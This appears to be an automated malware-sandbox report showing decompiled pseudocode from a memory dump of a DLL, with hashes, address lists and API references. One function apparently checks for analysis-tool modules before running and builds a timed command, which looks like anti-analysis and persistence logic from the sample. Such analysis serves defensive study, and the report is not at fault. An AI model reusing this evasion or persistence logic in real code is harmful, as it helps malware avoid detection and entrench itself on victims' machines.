Opcode ID: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
Instruction ID: 286451e2d6f5d77c3e96009a634a1e8f77bc4d61d346aa34e357d183eb196ad5
Opcode Fuzzy Hash: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
Instruction Fuzzy Hash: 9231E1B2904658AFF700CB68DC89F9E73ECEB58394F508129F105E7195EB34EE848B24

Uniqueness

Uniqueness Score: -1.00%

Function 10012D80, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D80(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x5fe85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015DA0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014B00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x5fe85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C40( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x5fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C40(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x5fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x5fe85000
							E10015DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014B00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x5fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10012d86
0x10012d8b
0x10012d8f
0x10012d92
0x10012d92
0x10012d95
0x10012d9a
0x10012d9f
0x10012da2
0x10012da7
0x10012daa
0x10012db0
0x10012db0
0x10012dbb
0x10012dbe
0x10012dc5
0x10012dca
0x00000000
0x00000000
0x10012dd0
0x10012dd5
0x10012dd5
0x10012dda
0x10012de0
0x10012dea
0x10012def
0x10012df5
0x10012e14
0x10012e17
0x10012e22
0x10012e22
0x10012e22
0x10012e19
0x10012e19
0x10012e1b
0x00000000
0x10012e1d
0x10012e1d
0x10012e1d
0x10012e1b
0x10012e2a
0x10012e2f
0x10012e34
0x10012e3a
0x10012e3e
0x10012e41
0x10012e44
0x10012e4a
0x10012e4f
0x10012e52
0x10012e58
0x10012e5d
0x10012e63
0x10012e69
0x10012e6e
0x10012e71
0x10012e76
0x10012e7a
0x10012e7e
0x10012e81
0x10012e84
0x10012e8d
0x10012e94
0x10012e97
0x10012e9a
0x10012e9f
0x10012ea4
0x10012ea7
0x10012eaa
0x10012eaa
0x10012eae
0x10012eb7
0x10012ebe
0x10012ec1
0x10012ec6
0x10012ecb
0x10012ecb
0x10012ece
0x10012ed3
0x00000000
0x00000000
0x10012df7
0x10012df9
0x10012e06
0x00000000
0x00000000
0x10012e06
0x10012df9
0x00000000
0x10012df5
0x10012ed9
0x10012ede
0x10012ee1
0x10012ee4
0x10012f8f
0x10012f8f
0x10012eea
0x10012eea
0x10012eea
0x10012eef
0x10012f19
0x10012f1c
0x10012f1c
0x10012f21
0x10012f23
0x10012f25
0x10012f28
0x10012f2b
0x10012f33
0x10012f38
0x10012f38
0x10012f3e
0x10012f41
0x10012f44
0x10012f47
0x10012f49
0x10012f49
0x10012f4a
0x10012f4a
0x10012f47
0x10012f58
0x10012f5b
0x10012f5f
0x10012f64
0x10012f67
0x10012f6a
0x10012f6a
0x10012f6a
0x10012f6d
0x10012f6d
0x10012f70
0x10012f70
0x10012ef1
0x10012ef1
0x10012f01
0x10012f04
0x10012f09
0x10012f09
0x10012f0c
0x10012f0f
0x10012f12
0x10012f14
0x10012f14
0x10012f73
0x10012f75
0x10012f78
0x10012f78
0x10012f7e
0x10012f82
0x10012f85
0x10012f87
0x10012f87
0x10012f98
0x10012f9a
0x10012f9a
0x10012fa2
0x10012fb0
0x10012fb3
0x10012fb5
0x10012fd5
0x10012fd5
0x10012fd8
0x10012fde
0x10012fdf
0x10012fe2
0x10012fe4
0x10012fe7
0x10012fea
0x10012fed
0x10012ff1
0x10012ff4
0x10012ff7
0x10012ffa
0x10012ffc
0x10012ffc
0x10012fff
0x10013001
0x10013001
0x10013004
0x10013006
0x10013009
0x10013011
0x10013014
0x10013019
0x10013019
0x1001301f
0x10013022
0x10013025
0x10013027
0x10013027
0x10013028
0x10013028
0x10013033
0x10013033
0x10013033
0x10013036
0x10013039
0x10013039
0x1001303c
0x1001303c
0x10012fff
0x1001303f
0x10013042
0x10013045
0x10013047
0x1001304a
0x1001304c
0x1001304f
0x10013052
0x10013054
0x10013057
0x1001305f
0x10013067
0x1001306a
0x1001306a
0x1001306a
0x1001306d
0x1001306d
0x1001306d
0x10013070
0x10013076
0x10013078
0x10013078
0x1001307e
0x10013084
0x1001308d
0x10013094
0x10013096
0x10013099
0x10013099
0x1001309c
0x1001309c
0x1001309f
0x100130a1
0x100130a4
0x100130a6
0x100130c1
0x100130c1
0x100130c5
0x100130c8
0x100130cb
0x100130ce
0x100130e4
0x100130e4
0x100130e4
0x100130d0
0x100130d0
0x100130d2
0x100130d6
0x100130d9
0x00000000
0x100130db
0x100130db
0x100130dd
0x00000000
0x100130df
0x100130df
0x100130df
0x100130dd
0x100130d9
0x100130e8
0x100130eb
0x100130f0
0x100130fa
0x100130fa
0x100130fa
0x100130fd
0x100130a8
0x100130a8
0x100130aa
0x100130b1
0x100130b1
0x100130b3
0x100130b5
0x100130b7
0x100130bb
0x100130bd
0x100130bf
0x00000000
0x00000000
0x100130bf
0x100130bb
0x100130ac
0x100130ac
0x100130af
0x00000000
0x00000000
0x100130af
0x100130aa
0x10013107
0x10013109
0x10013109
0x10013114
0x10012fb7
0x10012fb7
0x10012fba
0x00000000
0x10012fbc
0x10012fbc
0x10012fbe
0x10012fc2
0x00000000
0x10012fc4
0x10012fc4
0x10012fc4
0x10012fc7
0x00000000
0x10012fcb
0x10012fd4
0x10012fd4
0x10012fc7
0x10012fc2
0x10012fba
0x10012fa6
0x10012faf
0x10012faf

APIs

memcpy.MSVCRT ref: 10012E8D
memcpy.MSVCRT ref: 10012F04
memcpy.MSVCRT ref: 10012F33
memcpy.MSVCRT ref: 10012F5F
memcpy.MSVCRT ref: 10013014

Part of subcall function 10015DA0: memcpy.MSVCRT ref: 10015E7E

Part of subcall function 10014B00: memcpy.MSVCRT ref: 10014B2A

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction ID: 73544d1bf8d56d5a7bbbe12107b863a73eec727039acdfdce1cff8ad1696c42c
Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
Instruction Fuzzy Hash: 12D124B56006049FCB28CF69D8D4A6AB7F1FF88344B25892DE88ACB701D771F995CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6E, Relevance: 6.4, APIs: 4, Instructions: 424
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t117;
				signed int _t120;
				CHAR* _t122;
				intOrPtr _t123;
				CHAR* _t125;
				WCHAR* _t128;
				intOrPtr _t131;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t140;
				WCHAR* _t141;
				CHAR* _t142;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t151;
				WCHAR* _t152;
				signed int _t157;
				WCHAR* _t158;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t168;
				signed int _t171;
				signed int _t176;
				WCHAR* _t180;
				char _t181;
				intOrPtr _t195;
				intOrPtr _t206;
				signed int _t210;
				char _t215;
				WCHAR* _t226;
				intOrPtr _t230;
				intOrPtr _t233;
				WCHAR* _t234;
				signed int _t235;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				CHAR* _t246;
				intOrPtr _t258;
				intOrPtr _t266;
				void* _t267;
				void* _t269;
				intOrPtr _t270;
				void* _t276;
				intOrPtr _t278;
				void* _t295;
				void* _t296;
				intOrPtr _t302;
				WCHAR* _t322;
				CHAR* _t323;
				void* _t325;
				WCHAR* _t326;
				intOrPtr _t328;
				WCHAR* _t330;
				signed int _t333;
				intOrPtr* _t335;
				void* _t354;

				_t354 = __fp0;
				_t335 = (_t333 & 0xfffffff8) - 0x26c;
				_t117 =  *0x1001e688; // 0x2ff04a0
				_t242 = 0;
				_t325 = __ecx;
				_v620 = 0;
				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t13 = E1000B78E(0x1001b9c0,  &_v516) + 1; // 0x1
					E1000A853( &_v556, _t13, 0);
					_t295 = 0x64;
					_t120 = E1000A457( &_v556, _t295);
					 *0x1001e748 = _t120;
					if(_t120 != 0) {
						_push(0x4e5);
						_t296 = 0x10;
						 *0x1001e680 = E1000E1C7(0x1001b9c4, _t296);
						 *_t335 = 0x610;
						_t122 = E100095C7(0x1001b9c4);
						_push(_t242);
						_push(_t122);
						_v612 = _t122;
						_t123 =  *0x1001e688; // 0x2ff04a0
						_t125 = E100092CB(_t123 + 0x228);
						_t315 = _t125;
						_v616 = _t125;
						E100085BB( &_v612);
						_t128 = E1000B24F(_t125);
						__eflags = _t128;
						if(_t128 != 0) {
							_t234 = E10008955(_t315, 1, _t242, _t242);
							__eflags = _t234;
							if(_t234 != 0) {
								_t235 = E1000A2C9(_t234);
							} else {
								_t235 = _t242;
							}
							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
							 *_t325 = 3;
						}
						E10008600( &_v616, 0xfffffffe);
						_t131 =  *0x1001e688; // 0x2ff04a0
						_t21 = _t131 + 0x114; // 0x2ff05b4
						E10004A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
						_t258 =  *0x1001e688; // 0x2ff04a0
						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
							L19:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t325;
							_v576 =  *((intOrPtr*)(_t258 + 0x214));
							_t135 =  *0x1001e680; // 0x0
							_t136 =  *(_t135 + 8);
							__eflags = _t136;
							if(_t136 != 0) {
								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
							}
							_v620 = _t242;
							E1000E2D1(_t354,  &_v576);
							_pop(_t258);
							_t140 =  *0x1001e6b4; // 0x306fa20
							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
							__eflags = _t141;
							if(_t141 == 0) {
								E1000E2D1(_t354,  &_v588);
								_t230 =  *0x1001e6b4; // 0x306fa20
								_pop(_t258);
								 *((intOrPtr*)(_t230 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L37;
							} else {
								_t163 =  *0x1001e680; // 0x0
								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
									_t226 =  *(_t163 + 0xc);
									__eflags = _t226;
									if(_t226 != 0) {
										 *_t226(_v580);
									}
								}
								_t164 =  *0x1001e688; // 0x2ff04a0
								_t258 =  *((intOrPtr*)(_t164 + 0x214));
								__eflags = _t258 - 3;
								if(_t258 == 3) {
									goto L37;
								} else {
									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
											goto L37;
										}
										E100049A6();
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t168 =  *0x1001e684; // 0x306f878
										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
										_t266 = _v602;
										_t244 = 0x3c;
										_t171 = _t266 + 0x00000002 & 0x0000ffff;
										_v596 = _t171;
										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
										_t176 = _t266 + 0x0000000e & 0x0000ffff;
										_v624 = _t176;
										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
										_t180 = E100085EA(0x1000);
										_v632 = _t180;
										_pop(_t267);
										__eflags = _t180;
										if(_t180 != 0) {
											_t181 = E1000109A(_t267, 0x148);
											_t302 =  *0x1001e688; // 0x2ff04a0
											_v636 = _t181;
											_push(_t302 + 0x648);
											_push(0xa);
											_push(7);
											_t269 = 2;
											E10009013(_t269,  &_v572);
											_t270 =  *0x1001e688; // 0x2ff04a0
											_t330 = E100060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
											_v616 = _t330;
											__eflags = _t330;
											if(_t330 != 0) {
												_push(_v624 % _t244 & 0x0000ffff);
												_push(_v628 & 0x0000ffff);
												_push(_v596 % _t244 & 0x0000ffff);
												_push(_v620 & 0x0000ffff);
												_push(_t330);
												_push( &_v572);
												_t195 =  *0x1001e688; // 0x2ff04a0
												__eflags = _t195 + 0x1020;
												E10009626(_v632, 0x1000, _v636, _t195 + 0x1020);
												E100085BB( &_v636);
												E1000A8F7(_v632, 0, 0xbb8, 1);
												E10008600( &_v616, 0xfffffffe);
											}
											E10008600( &_v632, 0xfffffffe);
										}
										goto L42;
									}
									__eflags = _t258 - 2;
									if(_t258 != 2) {
										goto L37;
									}
									E100049A6();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t206 =  *0x1001e684; // 0x306f878
									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
									_t210 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t210;
									_t245 = 0x3c;
									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
									_t322 = E100085EA(0x1000);
									_v624 = _t322;
									_pop(_t276);
									__eflags = _t322;
									if(_t322 != 0) {
										_t215 = E100095C7(_t276, 0x32d);
										_t278 =  *0x1001e688; // 0x2ff04a0
										_push(_t278 + 0x228);
										_push(_v628 % _t245 & 0x0000ffff);
										_v636 = _t215;
										E10009626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
										E100085BB( &_v636);
										E1000A8F7(_t322, 0, 0xbb8, 1);
										E10008600( &_v624, 0xfffffffe);
									}
									goto L42;
								}
							}
						} else {
							_t233 =  *((intOrPtr*)(_t258 + 0x214));
							__eflags = _t233 - 3;
							if(_t233 == 3) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
								L37:
								_t142 = E100095C7(_t258, 0x610);
								_push(_t242);
								_push(_t142);
								_v616 = _t142;
								_t143 =  *0x1001e688; // 0x2ff04a0
								_t326 = E100092CB(_t143 + 0x228);
								_v612 = _t326;
								__eflags = _t326;
								if(_t326 != 0) {
									_t158 = E1000B24F(_t326);
									__eflags = _t158;
									if(_t158 != 0) {
										_t161 =  *0x1001e684; // 0x306f878
										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
									}
									E10008600( &_v612, 0xfffffffe);
								}
								E100085BB( &_v616);
								_t148 =  *0x1001e688; // 0x2ff04a0
								lstrcpynW(_t148 + 0x438,  *0x1001e740, 0x20a);
								_t151 =  *0x1001e688; // 0x2ff04a0
								_t152 = _t151 + 0x228;
								__eflags = _t152;
								lstrcpynW(_t152,  *0x1001e738, 0x20a);
								_t328 =  *0x1001e688; // 0x2ff04a0
								_t115 = _t328 + 0x228; // 0x2ff06c8
								 *((intOrPtr*)(_t328 + 0x434)) = E10008FA4(_t115, __eflags);
								E10008600(0x1001e740, 0xfffffffe);
								E10008600(0x1001e738, 0xfffffffe);
								L42:
								_t157 = 0;
								__eflags = 0;
								L43:
								return _t157;
							}
							__eflags = _t233 - 2;
							if(_t233 != 2) {
								goto L37;
							}
							goto L19;
						}
					}
					L9:
					_t157 = _t120 | 0xffffffff;
					goto L43;
				}
				_t246 = E100095AD(0x6e2);
				_v616 = _t246;
				_t323 = E100095AD(0x9f5);
				_v612 = _t323;
				if(_t246 == 0 || _t323 == 0) {
					L7:
					_t242 = 0;
					goto L8;
				} else {
					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
						_v620 = 1;
					}
					E100085A8( &_v616);
					_t120 = E100085A8( &_v612);
					if(_v620 != 0) {
						goto L9;
					}
					goto L7;
				}
			}

0x10004d6e
0x10004d74
0x10004d7a
0x10004d81
0x10004d83
0x10004d8d
0x10004d91
0x10004df2
0x10004e04
0x10004e07
0x10004e0e
0x10004e13
0x10004e18
0x10004e1f
0x10004e29
0x10004e30
0x10004e3b
0x10004e40
0x10004e47
0x10004e4d
0x10004e4e
0x10004e4f
0x10004e53
0x10004e5e
0x10004e66
0x10004e6c
0x10004e71
0x10004e79
0x10004e7e
0x10004e80
0x10004e88
0x10004e8f
0x10004e91
0x10004e99
0x10004e93
0x10004e93
0x10004e93
0x10004e9e
0x10004ea1
0x10004ea1
0x10004eae
0x10004eb3
0x10004ec1
0x10004ec9
0x10004ece
0x10004ed7
0x10004ede
0x10004efe
0x10004f04
0x10004f05
0x10004f06
0x10004f07
0x10004f08
0x10004f09
0x10004f13
0x10004f17
0x10004f1c
0x10004f1f
0x10004f21
0x10004f31
0x10004f31
0x10004f37
0x10004f3e
0x10004f43
0x10004f49
0x10004f50
0x10004f53
0x10004f55
0x10004f60
0x10004f65
0x10004f6a
0x10004f6f
0x10004f6f
0x10004f72
0x10004f79
0x00000000
0x10004f7f
0x10004f7f
0x10004f84
0x10004f87
0x10004f89
0x10004f8c
0x10004f8e
0x10004f94
0x10004f94
0x10004f8e
0x10004f96
0x10004f9b
0x10004fa1
0x10004fa4
0x00000000
0x10004faa
0x10004faa
0x10004fae
0x10005083
0x1000508a
0x00000000
0x00000000
0x10005090
0x1000509b
0x1000509c
0x1000509d
0x1000509e
0x100050a4
0x100050a9
0x100050af
0x100050b7
0x100050c0
0x100050c3
0x100050d2
0x100050d9
0x100050dc
0x100050ea
0x100050ee
0x100050f3
0x100050f7
0x100050f8
0x100050fa
0x10005105
0x1000510a
0x10005117
0x1000511b
0x1000511c
0x1000511e
0x10005126
0x10005127
0x1000512c
0x10005149
0x1000514e
0x10005152
0x10005154
0x10005167
0x10005171
0x10005175
0x1000517d
0x1000517e
0x10005187
0x10005188
0x1000518d
0x10005199
0x100051a3
0x100051b5
0x100051c1
0x100051c6
0x100051d0
0x100051d6
0x00000000
0x100050fa
0x10004fb4
0x10004fb7
0x00000000
0x00000000
0x10004fbd
0x10004fc8
0x10004fc9
0x10004fca
0x10004fcb
0x10004fd1
